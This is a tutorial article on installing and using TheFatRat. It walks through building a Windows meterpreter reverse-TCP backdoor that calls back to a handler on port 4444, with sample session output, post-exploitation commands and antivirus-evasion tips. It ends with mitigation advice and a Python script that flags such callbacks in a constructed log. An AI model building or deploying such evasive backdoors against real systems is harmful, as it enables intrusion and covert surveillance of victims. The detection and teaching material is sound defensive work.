TheFatRat: Generating Backdoors for Penetration Testing with Examples

Introduction

TheFatRat is an open-source exploitation tool designed to simplify the creation of backdoors and payloads for penetration testing and ethical hacking. Developed by Edo Maland and contributors, it automates the process of generating malware with popular payloads using MSFvenom and Metasploit, enabling testers to simulate real-world attacks. TheFatRat supports multiple operating systems (Windows, Linux, Mac, Android) and includes features like antivirus evasion, file pumping, and AutoRun file creation for USB/CDROM exploitation. It is primarily used on Linux distributions like Kali Linux for educational and authorized testing purposes.

This article provides a detailed tutorial on TheFatRat, covering its installation, key features, usage, and a practical example of creating a backdoor. Aimed at penetration testers, security researchers, and bug bounty hunters, this guide assumes basic familiarity with command-line interfaces and ethical hacking concepts. All examples are for educational purposes and must only be performed on systems you have explicit permission to test, such as lab environments or bug bounty targets. Unauthorized use of TheFatRat is illegal and unethical.

What is TheFatRat?

TheFatRat is a versatile tool that compiles payloads with popular exploits, creating backdoors that can bypass most antivirus software. It leverages MSFvenom and Metasploit to generate payloads in various formats (e.g., .exe, .apk, .php) and supports post-exploitation tasks like browser attacks and DLL injection. Originally released in 2016, TheFatRat has been updated to version 1.9.6 (as of 2019) and is hosted on GitHub (https://github.com/screetsec/TheFatRat).

Key Features

  • Payload Generation: Creates backdoors for Windows, Linux, Mac, and Android in formats like .exe, .apk, .php, .bat, and .elf.
  • Antivirus Evasion: Uses techniques like C language payloads, encryption, and file pumping to bypass AV detection.
  • Metasploit Integration: Automates MSFvenom for payload creation and Metasploit for listener setup.
  • File Pumper: Increases file size to evade detection or mimic legitimate files.
  • AutoRun Creation: Generates AutoRun scripts for USB/CDROM exploitation.
  • Cross-Platform Compatibility: Executes payloads on multiple operating systems.
  • Network Features: Detects external IP and interface addresses.
  • Ease of Use: Menu-driven interface with options for backdoor creation, listener setup, and exploitation.

Ethical Considerations

TheFatRat is intended for educational purposes and authorized penetration testing. Developers explicitly state that using it to attack systems without prior consent is illegal. Misuse can lead to severe legal consequences, and the creators assume no liability for unauthorized use.

System Requirements

  • Operating System: Kali Linux (recommended), Parrot OS, Cyborg, BackTrack, or other Linux distributions.
  • Dependencies: Metasploit Framework, Mono, MinGW-w64, Java, and other tools installed during setup.
  • Hardware: Minimum 2GB RAM; 4GB+ recommended for complex payload generation.
  • Network: Stable connection for listener setup and updates.

Installation Guide

TheFatRat is not pre-installed on Kali Linux and requires manual installation from GitHub. Below are the steps to set it up.

Installation Steps

  1. Update System:

     sudo apt update
     sudo apt install -y git

  2. Clone the Repository:

     git clone https://github.com/screetsec/TheFatRat.git
     cd TheFatRat

  3. Grant Execution Permissions:

     chmod +x setup.sh
     chmod +x fatrat
     chmod +x powerfull.sh

  4. Run Setup Script:

     ./setup.sh

    • The script checks and installs dependencies (e.g., Metasploit, Mono, MinGW-w64).
    • If prompted about the MinGW version, select No to avoid installation issues.

  5. Verify Installation:

     ./fatrat

     The main menu should appear, listing options for backdoor creation and other tasks.

Troubleshooting

  • Dependency Errors: If setup fails, manually install missing tools (e.g., sudo apt install mono-complete).
  • MinGW Issues: Choose “No” when prompted to update MinGW during setup to avoid version conflicts.
  • Updates: Run git pull && chmod +x setup.sh && ./setup.sh in the TheFatRat directory to update.
  • Check Tools: Use chk_tools script to diagnose setup issues:

./chk_tools

Using TheFatRat

TheFatRat operates through a menu-driven interface or direct script execution. Below is an overview of its main menu and key options.

Main Menu

Launch TheFatRat:

cd TheFatRat

./fatrat

Example Menu:

     TheFatRat - Massive Exploiting Tool

     1. Create Backdoor with msfvenom
     2. Create FUD Backdoor with PwnWinds
     3. Create Backdoor with PowerShell
     4. File Pumper
     5. Generate AutoRun for USB/CDROM
     6. Backdoor with Original APK
     7. Exit

Key Options

  • Option 1: Create a backdoor using MSFvenom (e.g., .exe, .php).
  • Option 2: Generate Fully Undetectable (FUD) backdoors with PwnWinds.
  • Option 4: Increase file size to evade AV detection.
  • Option 5: Create AutoRun files for USB exploitation.
  • Option 6: Embed payloads in legitimate Android APKs.

Command-Line Usage

For automation, run scripts directly (less common):

./fatrat

Navigate the menu to select options and configure payloads.

Practical Example: Creating a Windows Backdoor

This example demonstrates using TheFatRat to create a Windows backdoor in a controlled lab environment (e.g., a virtual machine running Windows 10). Do not use on unauthorized systems.

Step 1: Setup

  1. Prepare Environment:
    • Use Kali Linux (attacker IP: 192.168.1.100).
    • Set up a Windows 10 VM as the target (e.g., VirtualBox).
    • Ensure Metasploit is installed: sudo service metasploit start.
  2. Launch TheFatRat:

     cd TheFatRat
     ./fatrat

Step 2: Create a Backdoor

  1. Select Option 1 (Create Backdoor with MSFvenom).
  2. Choose target OS: Select Windows (option varies by menu).
  3. Select payload: Choose windows/meterpreter/reverse_tcp (e.g., option 5).
  4. Configure options:
    • LHOST: 192.168.1.100 (attacker’s IP).
    • LPORT: 4444 (listener port).
    • Output Name: backdoor.exe.
  5. Generate payload:
    • TheFatRat creates backdoor.exe in /root/TheFatRat/output/.
    • A Metasploit handler file (.rc) is generated for the listener.

Step 3: Set Up Metasploit Listener

  1. Start Metasploit with the generated handler file:

     msfconsole -r /root/TheFatRat/output/backdoor.rc

  2. Wait for the target to execute the payload.

Step 4: Deploy the Payload

  1. Transfer backdoor.exe to the Windows VM (e.g., via a shared folder or phishing simulation).
  2. Execute backdoor.exe on the target.
  3. Metasploit receives a Meterpreter session. Example output:

     [*] Started reverse TCP handler on 192.168.1.100:4444
     [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:54321)
     meterpreter > sysinfo
     Computer : WIN10-VM
     OS       : Windows 10 (Build 19041)

Step 5: Post-Exploitation

  1. Use Meterpreter commands:
    • getuid: Check user privileges.
    • screenshot: Capture the desktop.
    • shell: Access a command prompt.
  2. Example output:

     meterpreter > screenshot
     Screenshot saved to: /root/.msf4/screenshots/win10_2025-09-06.png

Step 6: File Pumping (Optional)

  1. Increase the payload size to evade AV:
    • Select Option 4 (File Pumper).
    • Choose backdoor.exe.
    • Set size: 10 MB.
  2. Output: Updated backdoor.exe with increased size.

Visual References

TheFatRat’s interface is menu-driven with text-based output. For screenshots:

  • GitHub: https://github.com/screetsec/TheFatRat (README shows the main menu and output).
  • YouTube Tutorials: Search “TheFatRat tutorial” (e.g., https://www.youtube.com/watch?v=7PMfPbrM0o4 for menu walkthroughs).
  • Medium Articles: Search “TheFatRat penetration testing” for visuals of payload generation and Metasploit sessions.
  • Hackers Arise: https://hackers-arise.com/post/2023/12/31/thefatrat-guide for setup and execution screenshots.

Best Practices and Tips

  • Legal Use: Only test systems with explicit permission. Unauthorized use is illegal and can lead to prosecution.
  • Lab Environment: Use virtual machines (e.g., VirtualBox, VMware) or lab platforms like Hack The Box or TryHackMe.
  • Antivirus Evasion: Test payloads on VirusTotal to verify FUD capabilities; combine with Veil for enhanced evasion (see Veil tutorial).
  • Integration: Pair with Metasploit for robust exploitation; use Discover for reconnaissance or sqlmap for web vulnerabilities (see previous tutorials).
  • Output Management: Check /root/TheFatRat/output/ for payloads and logs.
  • Common Issues:
    • Setup Failures: Run ./chk_tools in the TheFatRat directory to diagnose dependency issues.
    • AV Detection: Use PwnWinds (Option 2) or file pumping for better evasion.
  • Learning Resources:
    • GitHub: https://github.com/screetsec/TheFatRat
    • Web Security Academy: https://portswigger.net/web-security for related labs
    • TryHackMe: Rooms like “Metasploit” or “Penetration Testing Basics”
    • Black Hat Ethical Hacking: https://www.blackhatethicalhacking.com/news/thefatrat/

Mitigation Strategies

To protect against TheFatRat and similar tools:

  • Update Systems: Patch OS vulnerabilities regularly.
  • Antivirus Software: Use reputable AV (e.g., Windows Defender, Avast) with real-time protection.
  • Network Security: Monitor egress traffic for suspicious outbound connections, such as a workstation calling back to an unusual port (the reverse TCP callback to port 4444 in the example above).
  • User Awareness: Avoid executing unknown files or clicking phishing links.
  • File Integrity: Verify executable integrity (e.g., a known-good hash or a valid code signature) before running.
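The network-monitoring bullet is the one a defender can actually test against data. The sample session output earlier in this article shows the victim (192.168.1.101) connecting out to the handler at 192.168.1.100:4444, and that outbound pattern is what a simple egress check can catch. The script below is an added example, not part of TheFatRat or of this article: it parses a handful of constructed connection-log lines (the one-line-per-flow format is an assumption, not any real product's format), flags outbound connections whose destination port is outside an assumed workstation baseline, marks the default Metasploit handler port 4444 explicitly, and groups repeated connections from one host to one destination so that reconnect behaviour stands out.

```python
"""Flag outbound connections that look like reverse-shell callbacks.

Added example, not code from TheFatRat or the article. The log format,
the port baseline and the sample lines are all constructed assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines (assumed format: <ISO timestamp> <src>:<sport> -> <dst>:<dport> <proto>).
# The 192.168.1.101 -> 192.168.1.100:4444 flows mirror the session shown in the article.
SAMPLE_LOG = """\
2025-09-06T10:00:01 192.168.1.101:50231 -> 142.250.74.36:443 TCP
2025-09-06T10:00:05 192.168.1.101:54321 -> 192.168.1.100:4444 TCP
2025-09-06T10:00:07 192.168.1.102:50244 -> 192.168.1.20:445 TCP
2025-09-06T10:01:05 192.168.1.101:54322 -> 192.168.1.100:4444 TCP
2025-09-06T10:02:05 192.168.1.101:54323 -> 192.168.1.100:4444 TCP
2025-09-06T10:02:40 192.168.1.103:50310 -> 93.184.216.34:80 TCP
"""

LINE_RE = re.compile(
    r"^(\S+) (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+) (\w+)$"
)

# Assumed baseline of ports a workstation normally talks to; tune per environment.
EXPECTED_PORTS = {53, 80, 88, 135, 139, 389, 443, 445, 636, 3389}
# 4444 is the default Metasploit LPORT and the port used in the article's example.
KNOWN_HANDLER_PORTS = {4444}


def parse_line(line):
    """Return a dict for one flow record, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, sport, dst, dport, proto = m.groups()
    return {
        "ts": datetime.fromisoformat(ts),
        "src": src, "sport": int(sport),
        "dst": dst, "dport": int(dport),
        "proto": proto,
    }


def classify(event):
    """List the reasons a single flow is worth a look (empty list = nothing unusual)."""
    reasons = []
    if event["dport"] not in EXPECTED_PORTS:
        reasons.append("uncommon destination port")
    if event["dport"] in KNOWN_HANDLER_PORTS:
        reasons.append("default Metasploit handler port")
    return reasons


def find_repeated_callbacks(events, min_count=3):
    """Group flows by (src, dst, dport) and report destinations hit min_count or more times.

    A reverse-TCP implant that keeps reconnecting to the same handler shows up here
    even if its port happens to be on the baseline list.
    """
    groups = defaultdict(list)
    for e in events:
        groups[(e["src"], e["dst"], e["dport"])].append(e["ts"])
    repeated = {}
    for key, times in groups.items():
        if len(times) >= min_count:
            times.sort()
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            repeated[key] = {"count": len(times), "mean_gap_s": sum(gaps) / len(gaps)}
    return repeated


def analyze(log_text):
    """Return (per-flow alerts, repeated-callback summary) for a block of log text."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    alerts = []
    for e in events:
        reasons = classify(e)
        if reasons:
            alerts.append({"src": e["src"], "dst": e["dst"],
                           "dport": e["dport"], "reasons": reasons})
    return alerts, find_repeated_callbacks(events)


if __name__ == "__main__":
    alerts, repeated = analyze(SAMPLE_LOG)
    for a in alerts:
        print(f"ALERT {a['src']} -> {a['dst']}:{a['dport']}: {', '.join(a['reasons'])}")
    for (src, dst, dport), info in repeated.items():
        print(f"REPEATED {src} -> {dst}:{dport} x{info['count']} "
              f"(mean gap {info['mean_gap_s']:.0f}s)")
```

On the constructed input, the three flows to 192.168.1.100:4444 are alerted twice over (uncommon port and known handler port) and also surface as a repeated callback with a 60-second mean gap, while the web and SMB flows stay quiet. A port allowlist alone is weak because a listener can be bound to 443 instead, which is why the repeated-destination grouping is kept as a second, port-independent signal.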

Conclusion

TheFatRat is a powerful tool for penetration testers, automating the creation of backdoors and payloads for authorized testing. Its integration with Metasploit, antivirus evasion capabilities, and cross-platform support make it a favorite among ethical hackers. However, its potential for misuse underscores the need for strict ethical guidelines. Practice in safe environments like Web Security Academy or Hack The Box, and always obtain permission before testing. By mastering TheFatRat, you can better understand exploitation techniques and strengthen defenses against real-world threats.

Author: Engr. M A Rshid Rony
Date: September 6, 2025
For updates, visit: https://github.com/screetsec/TheFatRat
